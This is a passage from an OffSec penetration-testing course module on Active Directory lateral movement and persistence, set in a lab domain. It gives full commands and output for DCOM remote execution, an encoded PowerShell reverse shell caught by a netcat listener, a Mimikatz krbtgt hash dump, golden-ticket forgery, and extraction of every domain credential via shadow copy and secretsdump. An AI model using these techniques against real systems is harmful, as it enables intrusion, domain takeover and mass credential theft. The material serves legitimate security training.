Once the application object is saved into the $dcom variable, we can pass the required argument to the application via the ExecuteShellCommand method. The method accepts four parameters: Command, Directory, Parameters, and WindowState. We're only interested in the first and third parameters, which will be populated with cmd and /c calc, respectively.
$dcom.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c calc","7")
Listing 30 - Executing a command on the remote DCOM object
Once we execute these two PowerShell lines from CLIENT74, we should have spawned an instance of the calculator app.
Because it's within Session 0, we can verify the calculator app is running with tasklist and filtering out the output with findstr.
C:\Users\Administrator>tasklist | findstr "calc"
win32calc.exe 4764 Services 0 12,132 K
Listing 31 - Verifying that calculator is running on FILES04
We can now improve our craft by extending this attack to a full reverse shell similar to what we did in the WMI and WinRM section earlier in this Module.
Having generated the base64 encoded reverse shell with our Python script, we can replace our DCOM payload with it.
$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5A...
AC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA","7")
Listing 32 - Adding a reverse-shell as a DCOM payload on CLIENT74
Switching to our Kali machine, we can verify any incoming connections on the listener that we simultaneously set up.
kali@kali:~$ nc -lnvp 443
listening on [any] 443 ...
connect to [192.168.118.2] from (UNKNOWN) [192.168.50.73] 50778
PS C:\Windows\system32> whoami
corp\jen
PS C:\Windows\system32> hostname
FILES04
Listing 33 - Obtaining a reverse-shell through DCOM lateral movement
Excellent! We gained a foothold on an additional internal box by abusing the DCOM MMC application.
In this Learning Unit, we learned the theory behind several lateral movement attacks and how to execute them from compromised clients.
Next, we'll discover how to maintain access on the target network through persistence techniques.
Resources
Some of the labs require you to start the target machine(s) below.
Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text and video.
Labs
- Start VM Group 1 and repeat the steps discussed in this section. Which MMC method accepts command shell arguments?
- Start VM Group 2 and connect as the jen user on client74 then try to abuse DCOM to move laterally to web04 to get the flag located on the administrator's desktop.
23.2. Active Directory Persistence
This Learning Unit covers the following Learning Objectives:
- Understand the general purpose of persistence techniques
- Leverage golden tickets as a persistence attack
- Learn about shadow copies and how can they be abused for persistence
Once an adversary has obtained access to a single or multiple hosts, they would like to maintain access as long as possible. This means that the attacker's access to the target network has to carry on after a reboot or even a credential change. MITRE defines the persistence tactic as a set of techniques aimed at maintaining an attacker's foothold on the target network.
We can use traditional persistence methods in an Active Directory environment, but we can also gain AD-specific persistence as well.
Note that in many real-world penetration tests or red-team engagements, persistence is not part of the scope due to the risk of incomplete removal once the assessment is complete.
In the next Learning Unit, we are going to explore how golden ticket and shadow copy techniques can be misused to retain access.
23.2.1. Golden Ticket
Returning to the explanation of Kerberos authentication, we'll recall that when a user submits a request for a TGT, the KDC encrypts the TGT with a secret key known only to the KDCs in the domain. This secret key is the password hash of a domain user account called krbtgt.
If we can get our hands on the krbtgt password hash, we could create our own self-made custom TGTs, also known as golden tickets.
Although this technique's name resembles the Silver Ticket one that we encountered in the Attacking Authentication Module, Golden Tickets provide a more powerful attack vector. While Silver Tickets aim to forge a TGS ticket to access a specific service, Golden Tickets give us permission to access the entire domain's resources, as we'll see shortly.
For example, we could create a TGT stating that a non-privileged user is a member of the Domain Admins group, and the domain controller will trust it because it is correctly encrypted.
We must carefully protect stolen krbtgt password hashes because they grant unlimited domain access. Consider explicitly obtaining the client's permission before executing this technique.
This provides a neat way of keeping persistence in an Active Directory environment, but the best advantage is that the krbtgt account password is not automatically changed.
This password is only changed when the domain functional level is upgraded from a pre-2008 Windows server, but not from a newer version. Because of this, it is not uncommon to find very old krbtgt password hashes.
The Domain Functional Level dictates the capabilities of the domain and determines which Windows operating systems can be run on the domain controller. Higher functional levels enable additional features, functionality, and security mitigations.
To test this persistence technique, we will first attempt to laterally move from the Windows 11 CLIENT74 workstation to the domain controller via PsExec as the jen user by spawning a traditional command shell with the cmd command. This should fail because we do not have the proper permissions.
C:\Tools\SysinternalsSuite>PsExec64.exe \\DC1 cmd.exe
PsExec v2.4 - Execute processes remotely
Copyright (C) 2001-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
Couldn't access DC1:
Access is denied.
Listing 34 - Failed attempt to perform lateral movement
Perfect, just as expected.
At this stage of the engagement, the golden ticket will require us to have access to a Domain Admin's group account or to have compromised the domain controller itself to work as a persistence method.
With this kind of access, we can extract the password hash of the krbtgt account with Mimikatz.
To simulate this, we'll log in to the domain controller with remote desktop using the jeffadmin account. Then we will run Mimikatz from C:\Tools, and issue the lsadump::lsa command as displayed below:
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # lsadump::lsa /patch
Domain : CORP / S-1-5-21-1987370270-658905905-1781884369
RID : 000001f4 (500)
User : Administrator
LM :
NTLM : 2892d26cdf84d7a70e2eb3b9f05c425e
RID : 000001f5 (501)
User : Guest
LM :
NTLM :
RID : 000001f6 (502)
User : krbtgt
LM :
NTLM : 1693c6cefafffc7af11ef34d1c788f47
...
Listing 35 - Dumping the krbtgt password hash using Mimikatz
Having obtained the NTLM hash of the krbtgt account, along with the domain SID, we can now forge and inject our golden ticket.
Creating the golden ticket and injecting it into memory does not require any administrative privileges and can even be performed from a computer that is not joined to the domain.
We'll take the hash and continue the procedure from a compromised workstation.
Let's move back to CLIENT74 as the jen user. Before we generate the golden ticket let's launch mimikatz and delete any existing Kerberos tickets with kerberos::purge.
mimikatz # kerberos::purge
Ticket(s) purge for current session is OK
Listing 36 - Purging existing Kerberos Tickets
Now, we'll supply the domain SID (which we can gather with whoami /user) to the Mimikatz kerberos::golden command to create the golden ticket.
This time, we'll use the /krbtgt option instead of /rc4 to indicate we are supplying the password hash of the krbtgt user account. Starting July 2022, Microsoft improved the authentication process, so we'll need to provide an existing account. Let's set the golden ticket's username to jen. Before it didn't matter if the account existed.
mimikatz # kerberos::golden /user:jen /domain:corp.com /sid:S-1-5-21-1987370270-658905905-1781884369 /krbtgt:1693c6cefafffc7af11ef34d1c788f47 /ptt
User : jen
Domain : corp.com (CORP)
SID : S-1-5-21-1987370270-658905905-1781884369
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 1693c6cefafffc7af11ef34d1c788f47 - rc4_hmac_nt
Lifetime : 9/16/2022 2:15:57 AM ; 9/13/2032 2:15:57 AM ; 9/13/2032 2:15:57 AM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'jen @ corp.com' successfully submitted for current session
mimikatz # misc::cmd
Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF665F1B800
Listing 37 - Creating a golden ticket using Mimikatz
Mimikatz provides two sets of default values when using the golden ticket option: the user ID and the groups ID. The user ID is set to 500 by default, which is the RID of the built-in administrator for the domain. The values for the groups ID consist of the most privileged groups in Active Directory, including the Domain Admins group.
With the golden ticket injected into memory, let's use PsExec_ to launch a new command prompt with misc::cmd.
C:\Tools\SysinternalsSuite>PsExec.exe \\dc1 cmd.exe
PsExec v2.4 - Execute processes remotely
Copyright (C) 2001-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
C:\Windows\system32>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::5cd4:aacd:705a:3289%14
IPv4 Address. . . . . . . . . . . : 192.168.50.70
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.50.254
C:\Windows\system32>whoami
corp\jen
Listing 38 - Using PsExec to access DC01
Great! We now have an interactive command prompt on the domain controller. Now let's use the whoami command to verify that our user jen is now part of the Domain Admin group.
C:\Windows\system32>whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
CORP\Domain Admins Group S-1-5-21-1987370270-658905905-1781884369-512 Mandatory group, Enabled by default, Enabled group
CORP\Group Policy Creator Owners Group S-1-5-21-1987370270-658905905-1781884369-520 Mandatory group, Enabled by default, Enabled group
CORP\Schema Admins Group S-1-5-21-1987370270-658905905-1781884369-518 Mandatory group, Enabled by default, Enabled group
CORP\Enterprise Admins Group S-1-5-21-1987370270-658905905-1781884369-519 Mandatory group, Enabled by default, Enabled group
CORP\Denied RODC Password Replication Group Alias S-1-5-21-1987370270-658905905-1781884369-572 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\High Mandatory Level Label S-1-16-12288
Listing 39 - Performing lateral movement and persistence using the golden ticket and PsExec
Perfect! Listing group memberships shows that we are now a member of multiple powerful groups including the Domain Admins group. Excellent.
Note that by creating our own TGT and then using PsExec, we are performing the overpass the hash attack by leveraging Kerberos authentication as we discussed earlier in this Module.
If we were to connect PsExec to the IP address of the domain controller instead of the hostname, we would instead force the use of NTLM authentication and access would still be blocked. This is illustrated in the listing below.
C:\Tools\SysinternalsSuite> psexec.exe \\192.168.50.70 cmd.exe
PsExec v2.4 - Execute processes remotely
Copyright (C) 2001-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
Couldn't access 192.168.50.70:
Access is denied.
Listing 40 - Use of NTLM authentication blocks our access
In this section, we have demonstrated the golden ticket technique as a persistence mechanism. By obtaining the NTLM hash of the krbtgt user, we can issue domain-administrative TGTs to any existing low-privileged account. This allows us to obtain inconspicuous legitimate access to the entire AD domain.
Resources
Some of the labs require you to start the target machine(s) below.
Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text and video.
Labs
- Start VM Group 1 and repeat the steps discussed in this section. Which user's NTLM hash do we need to abuse in order to forge a golden ticket?
- Start VM Group 2 and try to execute the golden ticket persistence technique to get access to DC1 and get the flag located on the administrator's desktop.
23.2.2. Shadow Copies
A Shadow Copy, also known as Volume Shadow Service (VSS) is a Microsoft backup technology that allows the creation of snapshots of files or entire volumes.
To manage volume shadow copies, the Microsoft signed binary vshadow.exe is offered as part of the Windows SDK.
As domain admins, we can abuse the vshadow utility to create a Shadow Copy that will allow us to extract the Active Directory Database NTDS.dit database file. Once we've obtained a copy of the database, we need the SYSTEM hive, and then we can extract every user credential offline on our local Kali machine.
To start, we'll connect as the jeffadmin domain admin user to the DC1 domain controller. Here we will launch an elevated command prompt and run the vshadow utility with -nw options to disable writers, which speeds up backup creation and include the -p option to store the copy on disk.
C:\Tools>vshadow.exe -nw -p C:
VSHADOW.EXE 3.0 - Volume Shadow Copy sample client.
Copyright (C) 2005 Microsoft Corporation. All rights reserved.
(Option: No-writers option detected)
(Option: Create shadow copy set)
- Setting the VSS context to: 0x00000010
Creating shadow set {f7f6d8dd-a555-477b-8be6-c9bd2eafb0c5} ...
- Adding volume \\?\Volume{bac86217-0fb1-4a10-8520-482676e08191}\ [C:\] to the shadow set...
Creating the shadow (DoSnapshotSet) ...
(Waiting for the asynchronous operation to finish...)
Shadow copy set succesfully created.
List of created shadow copies:
Querying all shadow copies with the SnapshotSetID {f7f6d8dd-a555-477b-8be6-c9bd2eafb0c5} ...
* SNAPSHOT ID = {c37217ab-e1c4-4245-9dfe-c81078180ae5} ...
- Shadow copy Set: {f7f6d8dd-a555-477b-8be6-c9bd2eafb0c5}
- Original count of shadow copies = 1
- Original Volume name: \\?\Volume{bac86217-0fb1-4a10-8520-482676e08191}\ [C:\]
- Creation Time: 9/19/2022 4:31:51 AM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
- Originating machine: DC1.corp.com
- Service machine: DC1.corp.com
- Not Exposed
- Provider id: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: Auto_Release No_Writers Differential
Snapshot creation done.
Listing 41 - Performing a Shadow Copy of the entire C: drive
Once the snapshot has been taken successfully, we should take note of the shadow copy device name.
We'll now copy the whole AD Database from the shadow copy to the C: drive root folder by specifying the shadow copy device name and adding the full ntds.dit path.
C:\Tools>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds.dit.bak
1 file(s) copied.
Listing 42 - Copying the ntds database to the C: drive
As a last ingredient, to correctly extract the content of ntds.dit, we need to save the SYSTEM hive from the Windows registry. We can accomplish this with the reg utility and the save argument.
C:\>reg.exe save hklm\system c:\system.bak
The operation completed successfully.
Listing 43 - Copying the ntds database to the C: drive
Once the two .bak files are moved to our Kali machine, we can continue extracting the credential materials with the secretsdump tool from the impacket suite. We'll supply the ntds database with the -ntds parameter and the system hive with the -system parameter. Then we will tell impact to parse the files locally by adding the LOCAL keyword.
kali@kali:~$ impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Target system bootKey: 0xbbe6040ef887565e9adb216561dc0620
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 98d2b28135d3e0d113c4fa9d965ac533
[*] Reading and decrypting hashes from ntds.dit.bak
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC1$:1000:aad3b435b51404eeaad3b435b51404ee:eda4af1186051537c77fa4f53ce2fe1a:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1693c6cefafffc7af11ef34d1c788f47:::
dave:1103:aad3b435b51404eeaad3b435b51404ee:08d7a47a6f9f66b97b1bae4178747494:::
stephanie:1104:aad3b435b51404eeaad3b435b51404ee:d2b35e8ac9d8f4ad5200acc4e0fd44fa:::
jeff:1105:aad3b435b51404eeaad3b435b51404ee:2688c6d2af5e9c7ddb268899123744ea:::
jeffadmin:1106:aad3b435b51404eeaad3b435b51404ee:e460605a9dbd55097c6cf77af2f89a03:::
iis_service:1109:aad3b435b51404eeaad3b435b51404ee:4d28cf5252d39971419580a51484ca09:::
WEB04$:1112:aad3b435b51404eeaad3b435b51404ee:87db4a6147afa7bdb46d1ab2478ffe9e:::
FILES04$:1118:aad3b435b51404eeaad3b435b51404ee:d75ffc4baaeb9ed40f7aa12d1f57f6f4:::
CLIENT74$:1121:aad3b435b51404eeaad3b435b51404ee:5eca857673356d26a98e2466a0fb1c65:::
CLIENT75$:1122:aad3b435b51404eeaad3b435b51404ee:b57715dcb5b529f212a9a4effd03aaf6:::
pete:1123:aad3b435b51404eeaad3b435b51404ee:369def79d8372408bf6e93364cc93075:::
jen:1124:aad3b435b51404eeaad3b435b51404ee:369def79d8372408bf6e93364cc93075:::
CLIENT76$:1129:aad3b435b51404eeaad3b435b51404ee:6f93b1d8bbbe2da617be00961f90349e:::
[*] Kerberos keys from ntds.dit.bak
Administrator:aes256-cts-hmac-sha1-96:56136fd5bbd512b3670c581ff98144a553888909a7bf8f0fd4c424b0d42b0cdc
Administrator:aes128-cts-hmac-sha1-96:3d58eb136242c11643baf4ec85970250
Administrator:des-cbc-md5:fd79dc380ee989a4
DC1$:aes256-cts-hmac-sha1-96:fb2255e5983e493caaba2e5693c67ceec600681392e289594b121dab919cef2c
DC1$:aes128-cts-hmac-sha1-96:68cf0d124b65310dd65c100a12ecf871
DC1$:des-cbc-md5:f7f804ce43264a43
krbtgt:aes256-cts-hmac-sha1-96:e1cced9c6ef723837ff55e373d971633afb8af8871059f3451ce4bccfcca3d4c
krbtgt:aes128-cts-hmac-sha1-96:8c5cf3a1c6998fa43955fa096c336a69
krbtgt:des-cbc-md5:683bdcba9e7c5de9
...
[*] Cleaning up...
Listing 44 - Copying the ntds database to the C: drive
Great! We managed to obtain NTLM hashes and Kerberos keys for every AD user. We can now try to crack them or use as-is in pass-the-hash attacks.
While these methods might work fine, they leave an access trail and may require us to upload tools. An alternative is to abuse AD functionality itself to capture hashes remotely from a workstation.
To do this, we could move laterally to the domain controller and run Mimikatz to dump the password hash of every user, using the DC sync method described in the previous Module. This is a less conspicuous persistence technique that we can misuse.
Although most penetration tests wouldn't require us to be covert, we should always evaluate a given technique's stealthiness, which could be useful during future red-teaming engagements.
In this Learning Unit, we explored a few Windows Active Directory persistence techniques that could be employed during penetration testing or red-teaming exercises whose rules of engagement mandate we retain long-term access to the compromised environment.
Resources
Some of the labs require you to start the target machine(s) below.
Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text and video.
Labs
- Start VM Group 1 and repeat the steps discussed in this section. During a shadow copy operation, what is the designated name for the source location from which the ntds.dit is copied?
- Capstone Exercise: Start VM Group 2 and try to execute the dcsync technique and get access to dc1 in order to get the flag located on the administrator's desktop. To do so, log in via RDP as the jeffadmin and perform dcsync against the domain Administrator user to obtain its NTLM hash.
- Capstone Exercise: Once VM Group 3 is started, the domain corp.com has been modified. Log in as leon on CLIENT74 and use the techniques discussed in this Module to move laterally and get the flag on FILES04 Administrator's desktop.
- Capstone Exercise: Once VM Group 4 is started, the domain corp.com has been modified. Log in as the leon user on CLIENT76 and use the techniques discussed in this Module to move laterally and get the flag in the WEB04 shared folder.
23.3. Wrapping Up
This Module concludes Active Directory concepts by providing an overview of several Active Directory lateral movement and persistence techniques. While many techniques have been mentioned and explained here, there are many others worth exploring and others yet to be discovered.
The effectiveness of the techniques we learned is strictly related to the security posture of the environment we are testing. Although AD security has been greatly improved over the years, its attack surface it's ultimately dependent on the complexity of its design and interoperability with legacy systems that might impose lower security standards.
As we focused on how to execute these techniques, we also deliberately ignored stealthiness. The concept of stealth is a requirement on red-teaming exercises but generally not on penetration testing ones.
Nevertheless, mastering Active Directory enumeration, authentication, and lateral movement techniques is one step toward becoming an experienced penetration tester.
- © 2024 OffSec |
- Privacy |
- Terms of service
Previous Module
Attacking Active Directory Authentication
Next Module
Enumerating AWS Cloud Infrastructure
